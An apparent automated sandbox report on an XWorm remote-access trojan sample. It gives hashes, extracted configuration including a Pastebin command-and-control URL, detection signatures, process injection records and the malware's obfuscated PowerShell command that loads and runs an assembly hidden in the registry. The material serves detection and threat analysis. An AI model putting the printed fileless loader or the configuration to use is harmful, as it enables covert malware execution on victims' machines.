Analysis
-
max time kernel
150s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
31/10/2024, 08:59
Static task
static1
Behavioral task
behavioral1
Sample
2HAX8_DeadPayload.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
2HAX8_DeadPayload.exe
Resource
win10v2004-20241007-en
General
-
Target
2HAX8_DeadPayload.exe
-
Size
500KB
-
MD5
b315d6de4d0834723914982447aab54f
-
SHA1
f1b3b51e74e1f24faecf0524e7bbffe54feffe2e
-
SHA256
75636b480a5d5c94fde4c189286ea07a3c12194de8ee8bb18cd462d3ae019f2b
-
SHA512
b9afa7e84d33513e2255b24842847a9c25fc041b0d8e361836b4c2fd3787fba5b9a06c7633f1bb9b61ca56c650ddccd992a533b64f71105b6c36b69c648382ee
-
SSDEEP
12288:s3DTkV1ilKya0FOUuQ0gH+kmtbF6W05EJXp107sdzO:mkGTy
Malware Config
Extracted
xworm
5.0
QgVg78qW15uIsQ4H
-
Install_directory
%Public%
-
install_file
ohh.exe
-
pastebin_url
https://pastebin.com/raw/J09JweeH
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x0012000000016d3f-6.dat family_xworm behavioral1/memory/2840-8-0x0000000001120000-0x000000000112E000-memory.dmp family_xworm -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2756 created 420 2756 powershell.EXE 5 -
Xworm family
-
Executes dropped EXE 2 IoCs
pid Process 2840 DeadMan.exe 2804 DeadRoot.exe -
pid Process 2756 powershell.EXE -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2756 set thread context of 1928 2756 powershell.EXE 36 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DeadRoot.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 9069d447732bdb01 powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2756 powershell.EXE 2756 powershell.EXE 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe 1928 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2840 DeadMan.exe Token: SeDebugPrivilege 2756 powershell.EXE Token: SeDebugPrivilege 2756 powershell.EXE Token: SeDebugPrivilege 1928 dllhost.exe Token: SeAuditPrivilege 860 svchost.exe -
Suspicious use of WriteProcessMemory 43 IoCs
description pid Process procid_target PID 2860 wrote to memory of 2840 2860 2HAX8_DeadPayload.exe 31 PID 2860 wrote to memory of 2840 2860 2HAX8_DeadPayload.exe 31 PID 2860 wrote to memory of 2840 2860 2HAX8_DeadPayload.exe 31 PID 2860 wrote to memory of 2804 2860 2HAX8_DeadPayload.exe 32 PID 2860 wrote to memory of 2804 2860 2HAX8_DeadPayload.exe 32 PID 2860 wrote to memory of 2804 2860 2HAX8_DeadPayload.exe 32 PID 2860 wrote to memory of 2804 2860 2HAX8_DeadPayload.exe 32 PID 2648 wrote to memory of 2756 2648 taskeng.exe 34 PID 2648 wrote to memory of 2756 2648 taskeng.exe 34 PID 2648 wrote to memory of 2756 2648 taskeng.exe 34 PID 2756 wrote to memory of 1928 2756 powershell.EXE 36 PID 2756 wrote to memory of 1928 2756 powershell.EXE 36 PID 2756 wrote to memory of 1928 2756 powershell.EXE 36 PID 2756 wrote to memory of 1928 2756 powershell.EXE 36 PID 2756 wrote to memory of 1928 2756 powershell.EXE 36 PID 2756 wrote to memory of 1928 2756 powershell.EXE 36 PID 2756 wrote to memory of 1928 2756 powershell.EXE 36 PID 2756 wrote to memory of 1928 2756 powershell.EXE 36 PID 2756 wrote to memory of 1928 2756 powershell.EXE 36 PID 1928 wrote to memory of 420 1928 dllhost.exe 5 PID 1928 wrote to memory of 464 1928 dllhost.exe 6 PID 1928 wrote to memory of 480 1928 dllhost.exe 7 PID 1928 wrote to memory of 488 1928 dllhost.exe 8 PID 1928 wrote to memory of 596 1928 dllhost.exe 9 PID 1928 wrote to memory of 672 1928 dllhost.exe 10 PID 1928 wrote to memory of 752 1928 dllhost.exe 11 PID 1928 wrote to memory of 816 1928 dllhost.exe 12 PID 1928 wrote to memory of 860 1928 dllhost.exe 13 PID 1928 wrote to memory of 1000 1928 dllhost.exe 15 PID 1928 wrote to memory of 300 1928 dllhost.exe 16 PID 1928 wrote to memory of 272 1928 dllhost.exe 17 PID 1928 wrote to memory of 1040 1928 dllhost.exe 18 PID 1928 wrote to memory of 1220 1928 dllhost.exe 19 PID 1928 wrote to memory of 1308 1928 dllhost.exe 20 PID 1928 wrote to memory of 1352 1928 dllhost.exe 21 PID 1928 wrote to memory of 1500 1928 dllhost.exe 23 PID 1928 wrote to memory of 1692 1928 dllhost.exe 24 PID 1928 wrote to memory of 796 1928 dllhost.exe 25 PID 1928 wrote to memory of 1916 1928 dllhost.exe 26 PID 1928 wrote to memory of 668 1928 dllhost.exe 27 PID 1928 wrote to memory of 2648 1928 dllhost.exe 33 PID 1928 wrote to memory of 2756 1928 dllhost.exe 34 PID 1928 wrote to memory of 2144 1928 dllhost.exe 35
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:420
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{0efa0dc4-e9f0-4b1b-b204-893c38208aa1}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1928
-
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:464
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:596
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe3⤵PID:1692
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:796
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:672
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
PID:752
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:816
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1308
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Suspicious use of AdjustPrivilegeToken
PID:860 -
C:\Windows\system32\taskeng.exetaskeng.exe {D4668F3E-99B5-4463-99FD-2C97CA00263F} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+'A'+[Char](82)+''+'E'+'').GetValue(''+[Char](68)+'e'+[Char](97)+''+[Char](100)+'s'+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2756
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:1000
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:300
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:272
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1040
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1220
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵PID:1500
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:1916
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:668
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:480
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:488
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1352
-
C:\Users\Admin\AppData\Local\Temp\2HAX8_DeadPayload.exe"C:\Users\Admin\AppData\Local\Temp\2HAX8_DeadPayload.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Users\Public\DeadMan.exe"C:\Users\Public\DeadMan.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2840
-
-
C:\Users\Public\DeadRoot.exe"C:\Users\Public\DeadRoot.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2804
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "15690388731834236358-983697056-20795912691860625003-1934699749-1464440155-1911295987"1⤵PID:2144
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
34KB
MD586596f8f255ec89d279b0824435e99ad
SHA1828d881cd4e693004ef8285aec99ef741b7f12ea
SHA256be04723ba31eb34aafe705d2ae69a8b76cd717f3d378c49eee960a86112b7a58
SHA512ed8429cf751326a5b646e35c59c61b2b3a0fdd7179f6a9a33e0bc70526dd96a72e02c2456d480cb26a8c0cd5f641842a73073bd2dc246d038d3642cec14f4672
-
Filesize
151KB
MD5b8479a23c22cf6fc456e197939284069
SHA1b2d98cc291f16192a46f363d007e012d45c63300
SHA25618294ee5a6383a48d1bcf2703f17d815529df3a17580e027c3efea1800900e8f
SHA512786cd468ce3723516dc869b09e008ec5d35d1f0c1a61e70083a3be15180866be637bd7d8665c2f0218c56875a0ee597c277e088f77dd403bdd2182d06bad3bd4